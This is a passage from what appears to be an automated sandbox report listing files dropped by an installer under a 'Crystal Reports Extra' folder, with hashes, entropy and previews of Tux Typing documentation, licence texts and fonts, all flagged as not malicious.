                                                          SHA-512:DDC83945B172CF4038E8E7CE97B856FD238E29B8EE05EC1DF196F5B9FD43BC20780B201B8D0438D1A67BD3BF0389BB96A1673C14CB6A722051EC569BF687BA3E
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">.<html>.<head>.<title>How to create a theme for Tux Typing 1.5.13</title>.<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">.</head>.<body bgcolor="#ffffff">.<h2>Theming in Tux Typing 1.5.13</h2>.<p><i><b>NOTE (Dec 10, 2008) - this document is not very current. Most importantly, native language support now uses the standard GNU gettext libraries. Also, font selection has been automated by use of SDL_Pango on platforms where is available (GNU/Linux, at this time). The handling of word lists and custom images is unchanged. This document will updated as the maintainer's time allows - DSB</i><b></p>..<p>A "Theme" is a method to change the data which Tuxtyping uses. While this could be used to change the game about Tux and fish, to a game about a Cat and mice, more likely you are interested in making Tuxtyping work in another language. (if you are intersted in creating a new graphical theme like "Racecar
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\doc\is-098P2.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:UTF-8 Unicode text
                                                          Category:dropped
                                                          Size (bytes):4390
                                                          Entropy (8bit):5.0878631480288785
                                                          Encrypted:false
                                                          SSDEEP:48:bGKA1YUK6lqGCNsdksZXnA2TZUIZABZpA5DtDVr36ko18dpeQqCvQ48SN7N3kPCz:KKA1HCNsdk5QpvRqCvaw1kPC3flcL+
                                                          MD5:4B8E4F960D80B0458ACBEEA70D025895
                                                          SHA1:8222D99B7F2CC775471BF0B55502627A457202B5
                                                          SHA-256:37D3194DBD584985C5544E805E293C3F2A8833D7CCAF0935AC8678895665DCB3
                                                          SHA-512:E7CCBDFD356A67B757C7B119189AC2C5A4707017AFA589644C9B43EBD72640C73182353EEE74267F9CDB7C66C59EB4FC0E821147A34E16EEE0A347106B915C80
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Tux Typing Original Author:.----------.Sam Hart <hart@geekcomix.com>..Current Maintainer and Lead Coder:.-------.David Bruce <davidstuartbruce@gmail.com>..Coders:.-------.David Bruce <davidstuartbruce@gmail.com>.Jesse Andrews <jdandr2@uky.edu>.Calvin Arndt <calarndt@tux4kids.org>.Sam Hart <hart@geekcomix.com>.Jacob Greig <bombastic@firstlinux.net>.Sreyas Kurumanghat.<k.sreyas@gmail.com>.Sreerenj Balachandran <bsreerenj@gmail.com>.Vimal Ravi <vimal_ravi@rediff.com>.Prince K. Antony <prince.kantony@gmail.com>.Mobin Mohan <mobinmohan@gmail.com>.Matthew Trey <tux4kids@treyhome.com>.Sarah Frisk <ssfrisk@gmail.com>..Packaging & Ports:.------------------.Holger Levsen <holger@debian.org> - (Debian packager).David Bruce <davidstuartbruce@gmail.com> - (Windows crossbuild using Linux host, OpenSUSE Build Service rpm packages, MacPorts build).Alex Shorthouse <ashorthouse@rsd13.org> - (more recent Mac OSX port).Luc Shrivers <Begasus@skynet.be> - (BeOS/Haiku port)..(previous packagers:).David Mar
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\doc\is-6O94V.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):76502
                                                          Entropy (8bit):2.4185965872860735
                                                          Encrypted:false
                                                          SSDEEP:384:cvXuypQc+jWYla0GOtQBknkYVM/kLR78k/RPfkRr06uUxKQH6k+9i:c2aEWyZztmknkeM/kd78k5Pfk086kl
                                                          MD5:B5A080B27B5B4C1A160D2BED1FCFAF9F
                                                          SHA1:B50287B75A3B098301455E34C8D8E52A09FA8938
                                                          SHA-256:4C825530CA79E944B63C56ED30BE58EF792B4ADAB6F7F38ABAB8C054432F4A86
                                                          SHA-512:4EFCE9472E21B052B8FE8113DD3B5480586C06CD27C8535712B10BAE2F7E32F33530A9E8C8DA6F6D8FEAD682EE556EAEC0CDA2525CE9121EC95B6E25F3075696
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: 1 Notes on the Free Translation Project.***************************************..Free software is going international! The Free Translation Project is.a way to get maintainers of free software, translators, and users all.together, so that free software will gradually become able to speak many.languages. A few packages already provide translations for their.messages... If you found this `ABOUT-NLS' file inside a distribution, you may.assume that the distributed package does use GNU `gettext' internally,.itself available at your nearest GNU archive site. But you do _not_.need to install GNU `gettext' prior to configuring, installing or using.this package with messages translated... Installers will find here some useful hints. These notes also.explain how users should proceed for getting the programs to use the.available translations. They tell how people wanting to contribute and.work on translations can contact the appropriate team... When reporting bugs in the `intl/' direct
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\doc\is-71NV9.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:HTML document, ASCII text, with very long lines
                                                          Category:dropped
                                                          Size (bytes):12081
                                                          Entropy (8bit):4.803085884480498
                                                          Encrypted:false
                                                          SSDEEP:192:GJJ6dzAFbjDECAUYMfPCpBjUipqr6n1LcVm+QdmG/x1L5/lNGI7:e6dzAN3/fCnpK6nlc0+gbF7
                                                          MD5:4C5FDDC1BE71C19D6E1AE718916F5878
                                                          SHA1:4F8DF91EBF3DF62F98B4FC92836D1CB36A986DE5
                                                          SHA-256:83BB9EA4E0E5609A959E8ED34D56AB6DD7CBA40D449EC22077ABFD2173A22ED8
                                                          SHA-512:DDC83945B172CF4038E8E7CE97B856FD238E29B8EE05EC1DF196F5B9FD43BC20780B201B8D0438D1A67BD3BF0389BB96A1673C14CB6A722051EC569BF687BA3E
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">.<html>.<head>.<title>How to create a theme for Tux Typing 1.5.13</title>.<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">.</head>.<body bgcolor="#ffffff">.<h2>Theming in Tux Typing 1.5.13</h2>.<p><i><b>NOTE (Dec 10, 2008) - this document is not very current. Most importantly, native language support now uses the standard GNU gettext libraries. Also, font selection has been automated by use of SDL_Pango on platforms where is available (GNU/Linux, at this time). The handling of word lists and custom images is unchanged. This document will updated as the maintainer's time allows - DSB</i><b></p>..<p>A "Theme" is a method to change the data which Tuxtyping uses. While this could be used to change the game about Tux and fish, to a game about a Cat and mice, more likely you are interested in making Tuxtyping work in another language. (if you are intersted in creating a new graphical theme like "Racecar
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\doc\is-GB5QC.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):1043
                                                          Entropy (8bit):4.6860266698980135
                                                          Encrypted:false
                                                          SSDEEP:24:NPVQRBFhBOKsV1+BBMKXOweWYK8dcxTJtXiwyfhpk:NuhBOKM1+BBMKdeLaJRr
                                                          MD5:4D1B4BFAD0C4D377505C3C14B7B60EBB
                                                          SHA1:07CBB76C647E8334506D1D63855689D4D001C4E2
                                                          SHA-256:D00691DE52A7961695100061C9717E57CFFAA2D390A9A25311FB6775122830D5
                                                          SHA-512:83D9BD9811EDFF42ACC72AEDB6DF95C28ABFFC197CC9521F3B3B62CD03B9A577F63E537FD8A6D941E61E6E24C6BE00977B3C98DC6608DBDF302ED6C28AE24449
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Updated 04 Apr 2010..Briefly, here are some current issues:..Tuxtype:..- Code: still needs a lot of cleanup. Tuxtype could benefit markedly from the reorganization using libt4k-common...- Build: mingw-cross-env crossbuild not ready for general consumption....- SDL_mixer 1.2.11 exits unexpectedly on initial call to Mix_OpenAudio(), reason not yet clear....- SDL_Pango builds successfully, but resultant program does not display any text when run under Windows....- If SDL_Pango disabled, configure script fails to link to SDL_ttf...- Build: need current binary build for Mac OS-X..- Input methods: tuxtype does not correctly handle keyboard input that uses more than one keypress for each character (such as Asian languages). The input methods code from tuxpaint has been added to the source tree, but is not yet actually used...- "Content" - could use better lessons to actually teach touch typing in a systematic fashion...- Should display lesson names rather than simply file names, and would b
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\doc\is-I8QQE.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):3612
                                                          Entropy (8bit):4.707814791494116
                                                          Encrypted:false
                                                          SSDEEP:96:PxyP+cp7u0m7yLhA5hnmQi+8Eea67yrzb4GeC3xLGRLyynj:Pwmw7uh95fiEeVOP41EEyo
                                                          MD5:F5E6311A96B7BD0715FFDD86CF1E1553
                                                          SHA1:BB80358A88F84F8E6A310D9920B92D8F30FF4C14
                                                          SHA-256:F5259F91C0D622D456FA99BE940184BD1EEB8EBD9D4EC28B44669BDD98176B45
                                                          SHA-512:2ED6167B6227A83DC361B175E7ACB0FB23B126E782153B76758D54748AC396D0C19BC6E54E1659A6F4F6B5AE36891EBFAE075D8BBC8C992FAA01388F990D096B
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: NOTE - this document is reasonably correct but not completely current..It will updated as the maintainer's time allows - DSB...Tux Typing:.An Educational Typing Tutor Game Starring Tux, the Linux Penguin.----------------------------------------------------------------..(To install the game on your system, please read the INSTALL file.).. If you are interested in Translation/moving this game to another . language, please send a mail to .. David Bruce <davidstuartbruce@gmail.com>, . Holger Levsen <debian@layer-acht.org>, or to:.. <tux4kids-tuxtype-dev@lists.alioth.debian.org>.. Additional information on this subject is covered in "HowToTheme.html". in the "doc/en" directory of this package...(Updated 04 Apr 2010)..This is version 1.8.1 of Tux Typing...In Fish Cascade you control Tux as he searches for fish to eat. Fish fall.from the top of the screen. These fish have letters on them. Unforunately.for Tux, eating a fish with a letter on it will cause his stomach to.
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\doc\is-KDGPL.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):15131
                                                          Entropy (8bit):4.682434970392502
                                                          Encrypted:false
                                                          SSDEEP:384:AEUwi5rRL67cyV12rPd34FomzM2/R+qWG:A7FCExGFzeqt
                                                          MD5:CBBD794E2A0A289B9DFCC9F513D1996E
                                                          SHA1:2D29C273FDA30310211BBF6A24127D589BE09B6C
                                                          SHA-256:67F82E045CF7ACFEF853EA0F426575A8359161A0A325E19F02B529A87C4B6C34
                                                          SHA-512:C1D6AA39A08542C0C92057946FA1E6A65759575DE1C446B0D11CDF922B2F41EB088B7DC007CD3858FF4AC8C22D6F02E4FAA94FF6A697064613F073C432FB1EF1
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: .. GNU GENERAL PUBLIC LICENSE... Version 2, June 1991.. Copyright (C) 1989, 1991 Free Software Foundation, Inc.. 675 Mass Ave, Cambridge, MA 02139, USA. Everyone is permitted to copy and distribute verbatim copies. of this license document, but changing it is not allowed...... Preamble.. The licenses for most software are designed to take away your.freedom to share and change it. By contrast, the GNU General Public.License is intended to guarantee your freedom to share and change free.software--to make sure the software is free for all its users. This.General Public License applies to most of the Free Software.Foundation's software and to any other program whose authors commit to.using it. (Some other Free Software Foundation software is covered by.the GNU Library General Public License instead.) You can apply it to.your programs, too... When we speak of free software, we are referring to freedom, not.price. Our General Public Licenses are de
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\doc\is-LH7R9.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text, with very long lines
                                                          Category:dropped
                                                          Size (bytes):4056
                                                          Entropy (8bit):4.947683257149111
                                                          Encrypted:false
                                                          SSDEEP:96:88AMGX2Jjro4obNTSdO7BUz6pZRgrKGTg:tApGJHoZtSw7arTTg
                                                          MD5:12CD9A17B7741CB9989FEA8AEBF82C6F
                                                          SHA1:B321C8B0122548853C9FCEDE1DCA4640C13711DD
                                                          SHA-256:685964CBDA0311A79D10B315C503B15A7CE3EF9EC60C62AD8CE73DBA21A5986B
                                                          SHA-512:488C19FE3D911FA5A8EC15E3712550BD1F6A2F3BEAF0A98E4432F86C77B891E044E724426F322FCA70B4D88E929F094454FCF890D2EEEC25B209447B95193FE1
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: How I Ported Tuxtype to Mac OS X:..**Note** I am writing this from memory. These steps should work, but if they do not, contact the tuxtype developer team and search google for answers. That is how I was able to port Tuxtype...**Note** My tuxtye.xcodeproj should exist in the Tuxtype SVN. Open that to see my settings for the project...Requirements: .1. Mac OS 10.4 or higher (10.3, SDL, and Quicktime causes an error, so use 10.4).2. Xcode 2.5 [a free download from Apple's website] (or Xcode 3 should work but has not been tested)...Steps to get Tuxtype working on a Mac:..1. Download the following source codes:. a. SDL (I used version 1.2.12) [http://www.libsdl.org/download-1.2.php]. b. SDL_image (I used version 1.2.6) [http://www.libsdl.org/projects/SDL_image/]. c. SDL_mixer (I used version 1.2.8) [http://www.libsdl.org/projects/SDL_mixer/]. d. SDL_ttf (I used version 2.0.9) [http://www.libsdl.org/projects/SDL_ttf/]..2. Once you have SDL, open the SDL direct
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\doc\is-MKJK3.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):4599
                                                          Entropy (8bit):4.991877820151237
                                                          Encrypted:false
                                                          SSDEEP:96:rmgAmgnPUibMxxUDfGkKnjfRU88f+BktjVKvR1wyQeQHDZoN:yiXsMPZW88f+XvR9QHtE
                                                          MD5:969851E3A70122069A4D9EE61DD5A2ED
                                                          SHA1:C450C836DB375B12AB7A4C10B09375513D905A68
                                                          SHA-256:CE243FD4A62B1B76C959FFBA6EC16A7A3146B2362D441AE4F9F7F32FC3750D6C
                                                          SHA-512:54B335554F88E01EF0B07ED5F20C7FBC86EDE2E6395BA53AFC7B5DDF8C7DA728309A70E178ACD5AA8AFD16BCDF64527A1ACBB54D51D693A2966D34218F963DCE
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Copyright (c) <dates>, <Copyright Holder> (<URL|email>),.with Reserved Font Name <Reserved Font Name>..Copyright (c) <dates>, <additional Copyright Holder> (<URL|email>),.with Reserved Font Name <additional Reserved Font Name>..Copyright (c) <dates>, <additional Copyright Holder> (<URL|email>)...This Font Software is licensed under the SIL Open Font License, Version 1.1..This license is copied below, and is also available with a FAQ at:.http://scripts.sil.org/OFL...-----------------------------------------------------------.SIL OPEN FONT LICENSE Version 1.1 - 26 February 2007.-----------------------------------------------------------..PREAMBLE.The goals of the Open Font License (OFL) are to stimulate worldwide.development of collaborative font projects, to support the font creation.efforts of academic and linguistic communities, and to provide a free and.open framework in which fonts may be shared and improved in partnership.with others...The OFL allows the licensed fonts to be used,
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\doc\is-NGKMM.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:HTML document, ASCII text, with very long lines
                                                          Category:dropped
                                                          Size (bytes):36160
                                                          Entropy (8bit):4.7594335666742
                                                          Encrypted:false
                                                          SSDEEP:192:n6RclftgswUxW/UJT57VEhtiS06VkndpfZsZKZgZjZo9qR9ILWZUZyZFZaZMZ7ZJ:BTgswUR7VEhGyBN
                                                          MD5:AADCC5C24B7AA66773A82C8DCF90DC3F
                                                          SHA1:35AB43174C9489801E957ED0E19E50ABD6ED655D
                                                          SHA-256:9C8C1508E4255C98C0ECBFFB6184C50711E32B2B150346CE2B53AA58BD5749DC
                                                          SHA-512:5127B56915677B5E1E17C8FB9B8B9B26BCA07B53E9585437B38B1E94F422EDA5ED7B59BA86DFBFE0247E75A8351C61BAE505874AE3D2A3410275AA51154CC6C9
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: <HTML>.<BODY>.<H1>TuxType Custom Scripting Reference</H1>.<h3>Contents</h3>.<a href="#introduction">Introduction</a><BR>.<a href="#locations">File Locations</a><BR>.<a href="#basics">The Basics</a><BR>.<a href="#hierarchy">XML Tag Hierarchy</a><BR>.<a href="#samples">Samples</a><BR>.<a href="#tags">Tag Reference</a><BR>..<BR><BR><BR><BR>.<a name="introduction">.<h4>Introduction</h4>.Tuxtype lessons can be customized with relative ease. It just takes a little<BR>.imagination, and a text editor.<BR>.<BR>.<a name="locations">.<h4>File Locations</h4>.Tuxtype first looks in your language (theme) directory for lesson files<BR>.<B>(Non-English Users Only)</B><BR>.eg: (&lt;TuxType directory&gt;/data/themes/&lt;language&gt;/scripts/),<BR><BR>.or in the default directory if you are using TuxType in english<BR>.(&lt;TuxType directory&gt;/data/scripts/)<BR>.<BR>.If there is not a scripts folder in your language (theme) directory, You may<BR>.safely create it<BR>.<BR>.<a name="basics">.<h4>The Ba
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\doc\is-Q5V6P.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:UTF-8 Unicode text
                                                          Category:dropped
                                                          Size (bytes):29717
                                                          Entropy (8bit):4.7846516544735325
                                                          Encrypted:false
                                                          SSDEEP:384:smHYO2QyLSEN5KmtCVtaMmy8dnMQxWMW0bbyyuE1T0+bTh1qWBHXYzI1W5L4V8Gd:1aQHej26aWvm6cC0WFmPY
                                                          MD5:DD4E1B9708EF55F30D06198198AD2B03
                                                          SHA1:34092F4338FD69E66F8C4525201BCF760FD55019
                                                          SHA-256:07DEC805477121755D2C4309547017BBF6AE4A439C8D3925B7D928CAB2FFEEA7
                                                          SHA-512:71A3423F3F68B99ECBAD311C00BBD00D9806037D71DDC5378D91D6E01EE64EF44DA8569DA027498D4F94CD0293C5DD504A042B64DEDF875DF92D9D96CE450352
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: 04 Apr 2010 (git.debian.org/tux4kids/tuxtype.git - tag = "version-1.8.1".[ David Bruce <davidstuartbruce@gmail.com> ].Version 1.8.1..- Several minor enhancements - git commit messages now serving as..primary documentation of development, rather than this changelog...- Fish cascade backgrounds now selected randomly...- Fish cascade graphics now use true alpha channel rather than SDL..colorkey...- Some fixes related to file location of custom word lists...09 Nov 2009 (svn.debian.org/tux4kids - revision 1640) .[ David Bruce <davidstuartbruce@gmail.com> ].Version 1.8.0. - Sarah Frisk's word list editor from GSoC 2009 has been merged in as. a new, somewhat "beta" feature...12 Sep 2009 (svn.debian.org/tux4kids - revision 1532) .[ David Bruce <davidstuartbruce@gmail.com> ]. - Media - new music files and backgrounds contributed by Caroline Ford,. some old sounds (the ones with suboptimal free licensing) removed - Tux. Typing is now 100% DFSG-compliant. Re
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\doc\is-RUFVL.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):10644
                                                          Entropy (8bit):4.801280319778263
                                                          Encrypted:false
                                                          SSDEEP:192:ZwDpWkkNH3WhWdWjPpAcWaprsKtFd2W7688zIOKBRqB:ZwDpWkCXWhWdWbp7WapTtyW7n0oRqB
                                                          MD5:8FB227C6E1B6375D0AFD0DEED289E0B4
                                                          SHA1:8C30D1E996821D2BA9E84E86214F24CBC094A005
                                                          SHA-256:C4ADD274C0889E61F7F6B591C601842F9F9C3E7C17D36E4374AFEF4E1F899A50
                                                          SHA-512:6BC7638BE91AFD98E0DC37B91007C1997B32CAFDFF524A6B4C06BC5DD61E28E9D184A2B662DBF55765F88CA3BB2DF3C7EBB00CA6287A011001C2D1AF1FA279AF
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Tux Typing 1.8.1.04 Apr 2010..NOTE - this document is reasonably correct but not completely current..It will updated as the maintainer's time allows. For GNU/Linux users, you.need the "*dev" files for the SDL libs listed below, and should have the.dev file for SDL_Pango if you want to display non-Western text. TuxType.will build successfully, but without SDL_Pango support, if this header/lib.is not found...Most GNU/Linux users can install Tux Typing with their distribution's .package manager (such as apt or yum). To build from source, you can grab.the tuxtype_w_fonts*tar.gz, untar it, and build with "./configure; make;.make install". You do not need Autotools unless you are building from.a Subversion repository checkout. MacOSX users and Windows users can.install with very user-friendly binary installer packages - DSB...The current web site is http://www.tux4kids.com..The developer mailing list is tux4kids-tuxtype-dev@lists.alioth.debian.org..Feel free to email with any feedback or
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\doc\lesson_scripting_reference.html (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:HTML document, ASCII text, with very long lines
                                                          Category:dropped
                                                          Size (bytes):36160
                                                          Entropy (8bit):4.7594335666742
                                                          Encrypted:false
                                                          SSDEEP:192:n6RclftgswUxW/UJT57VEhtiS06VkndpfZsZKZgZjZo9qR9ILWZUZyZFZaZMZ7ZJ:BTgswUR7VEhGyBN
                                                          MD5:AADCC5C24B7AA66773A82C8DCF90DC3F
                                                          SHA1:35AB43174C9489801E957ED0E19E50ABD6ED655D
                                                          SHA-256:9C8C1508E4255C98C0ECBFFB6184C50711E32B2B150346CE2B53AA58BD5749DC
                                                          SHA-512:5127B56915677B5E1E17C8FB9B8B9B26BCA07B53E9585437B38B1E94F422EDA5ED7B59BA86DFBFE0247E75A8351C61BAE505874AE3D2A3410275AA51154CC6C9
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: <HTML>.<BODY>.<H1>TuxType Custom Scripting Reference</H1>.<h3>Contents</h3>.<a href="#introduction">Introduction</a><BR>.<a href="#locations">File Locations</a><BR>.<a href="#basics">The Basics</a><BR>.<a href="#hierarchy">XML Tag Hierarchy</a><BR>.<a href="#samples">Samples</a><BR>.<a href="#tags">Tag Reference</a><BR>..<BR><BR><BR><BR>.<a name="introduction">.<h4>Introduction</h4>.Tuxtype lessons can be customized with relative ease. It just takes a little<BR>.imagination, and a text editor.<BR>.<BR>.<a name="locations">.<h4>File Locations</h4>.Tuxtype first looks in your language (theme) directory for lesson files<BR>.<B>(Non-English Users Only)</B><BR>.eg: (&lt;TuxType directory&gt;/data/themes/&lt;language&gt;/scripts/),<BR><BR>.or in the default directory if you are using TuxType in english<BR>.(&lt;TuxType directory&gt;/data/scripts/)<BR>.<BR>.If there is not a scripts folder in your language (theme) directory, You may<BR>.safely create it<BR>.<BR>.<a name="basics">.<h4>The Ba
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\fonts\Kedage-n.ttf (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:TrueType Font data, 16 tables, 1st "GDEF", 26 names, Unicode
                                                          Category:dropped
                                                          Size (bytes):100056
                                                          Entropy (8bit):6.938355019015695
                                                          Encrypted:false
                                                          SSDEEP:1536:f2IGmE7hw5dfZZx1NoA/U5c/H4yQcAa+CrSV/DiU+XB6xAY3DG2NLyPGfGT85Sfx:f2xwLZZxb/U5PyQnaZ2ewrDGiLyPv
                                                          MD5:16024BEA0EB7A59995C59EDF5DF20D8F
                                                          SHA1:33710D5CEEA4684CE09C4616DBE03B881058640F
                                                          SHA-256:9AC4C694374E9BDD49C74E5852A990EAF1256D92DE859E6F2CBC42272102C1A5
                                                          SHA-512:C3B7E12D526745B189AA1606B14E950E1F7913491EF105A8264705E699E0352830F541190477403F8FC3616F1DE6CA9CC111D6A9C96505587B3B0BCCFBABEB0A
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: ............GDEF......z....ZGPOSk.d...z\... GSUB=rS...z|...ZOS/27.i........VPCLT..o...y....6cmap.#..........cvt }.#........:fpgm.3.O...x....glyf.a%.......OHhead.~*........6hhea...^...D...$hmtxF._.........loca.=.........maxp.>.>...h... name.JBF..a....9post.9x|..e.............4m9._.<..........s........8R.....q.9...........................4.q.....................................@.....@.........N.....................P.f...............@..............MS .@. ...r.......H.............................u.f.......d.y.f.....R.........T.;.f.......f...f.F.......=.................................!...!.....=...q...........J...J.T.;.\.J.T.....{.f.....{...{...p...^.).{.u.{...........s...q...d...F...F...F...g.{.}...d...R...F...F...m...F...y...{...m...y...{...{.=.o.......o...o...o...h...{...{...F...F.Z.q.`.m...y...f...q...{...q...m...{...}...^...+.F...F...D.d.................F...y...............;.V.F.m.y.....m.......y...H...T...m...f...T...f...R...j...b.........D.d.......o.).X.V.........o.........y......
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\fonts\is-878RF.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:TrueType Font data, 20 tables, 1st "GDEF", 16 names, Macintosh, Copyright (c) 2003, Automatic Control Equipments, Pune, INDIA. - under General Public LicenseLo
                                                          Category:dropped
                                                          Size (bytes):64760
                                                          Entropy (8bit):6.514217361307989
                                                          Encrypted:false
                                                          SSDEEP:1536:/JkO5XuoOM3qn3RDWuLHmBET8La0O5dGXwZR:x75Xu5n3BWubmST8ufdGAz
                                                          MD5:2E6070E9B26AC1377F9208C320D62591
                                                          SHA1:A5C6D4AC71748C0979968A40180A575F611C73D4
                                                          SHA-256:9499F3B7446292DC164A7ACDABD8B6B38AE3D94B9D092004C1ED48DCBB83BB44
                                                          SHA-512:06EB42262382E78D83D48D554EA4453AFB36887C57643CED6128139B71D4465544B79689D939DE52F6EB426788153F71B79F1E3D70563D51632A12D743E5714F
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: ...........@GDEF.&.%...L....GPOS"v/....l....GSUBlT.....t....LTSHSr.........#OS/2...........VVDMX[zc....t....cmap&.`...T....cvt ......`...xfpgm..^........dgasp.......<....glyf0y.....L...Rhdmx3.>V......Dhead...........6hhea...........$hmtx......@...|loca...E......@maxp........... name............post....... ....prepS0_................................................*.8..taml......ENG ..................abvm.......................|...................................................................................h.........................................u.u...................u.u.................................................2.v..taml......ENG ..........................abvs. akhn.(half..haln.4psts.:...........................................".*.2.:.B.J.......@.......V.......x.................................................................r.r.........4.8.<.@.D.H.L.P.T.X.\.`.d.h.l.p.t.x.|...........\...^...`...b...d...f...h...j...l...n...p...r...t...v...x...z...|...~..................
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\fonts\is-DJ1Q7.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:TrueType Font data, 16 tables, 1st "GDEF", 26 names, Unicode
                                                          Category:dropped
                                                          Size (bytes):100056
                                                          Entropy (8bit):6.938355019015695
                                                          Encrypted:false
                                                          SSDEEP:1536:f2IGmE7hw5dfZZx1NoA/U5c/H4yQcAa+CrSV/DiU+XB6xAY3DG2NLyPGfGT85Sfx:f2xwLZZxb/U5PyQnaZ2ewrDGiLyPv
                                                          MD5:16024BEA0EB7A59995C59EDF5DF20D8F
                                                          SHA1:33710D5CEEA4684CE09C4616DBE03B881058640F
                                                          SHA-256:9AC4C694374E9BDD49C74E5852A990EAF1256D92DE859E6F2CBC42272102C1A5
                                                          SHA-512:C3B7E12D526745B189AA1606B14E950E1F7913491EF105A8264705E699E0352830F541190477403F8FC3616F1DE6CA9CC111D6A9C96505587B3B0BCCFBABEB0A
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: ............GDEF......z....ZGPOSk.d...z\... GSUB=rS...z|...ZOS/27.i........VPCLT..o...y....6cmap.#..........cvt }.#........:fpgm.3.O...x....glyf.a%.......OHhead.~*........6hhea...^...D...$hmtxF._.........loca.=.........maxp.>.>...h... name.JBF..a....9post.9x|..e.............4m9._.<..........s........8R.....q.9...........................4.q.....................................@.....@.........N.....................P.f...............@..............MS .@. ...r.......H.............................u.f.......d.y.f.....R.........T.;.f.......f...f.F.......=.................................!...!.....=...q...........J...J.T.;.\.J.T.....{.f.....{...{...p...^.).{.u.{...........s...q...d...F...F...F...g.{.}...d...R...F...F...m...F...y...{...m...y...{...{.=.o.......o...o...o...h...{...{...F...F.Z.q.`.m...y...f...q...{...q...m...{...}...^...+.F...F...D.d.................F...y...............;.V.F.m.y.....m.......y...H...T...m...f...T...f...R...j...b.........D.d.......o.).X.V.........o.........y......
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\fonts\is-K1NF7.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:TrueType Font data, 16 tables, 1st "GDEF", 14 names, Macintosh
                                                          Category:dropped
                                                          Size (bytes):76600
                                                          Entropy (8bit):6.3178993263494165
                                                          Encrypted:false
                                                          SSDEEP:1536:V6ksURZ3E0fWPnVV9X15POG/EVy0Mft4tb1a7Il/6gbScGTDI1uw44f:VpvPRfWPVXj1EVut4V1a7GygGgr
                                                          MD5:4808DDF3A48DC3B6A4F93DBD3D17EB4E
                                                          SHA1:0629A606CF59C08EBCF53DCD9535AE0D30755903
                                                          SHA-256:5EA6D5AF952385A37B83EB3821253D46542AF509673ADD90075E7FEAF1D8B453
                                                          SHA-512:F48B68DC4F4C90125347A8327F8D5C91636630528B5B033045401C784B088FD00FC812B978D4466779419C3EC1AD726B1DA41308079E86A1DB62FBB7E8CAEE88
                                                          Malicious:false
                                                          Reputation:unknown
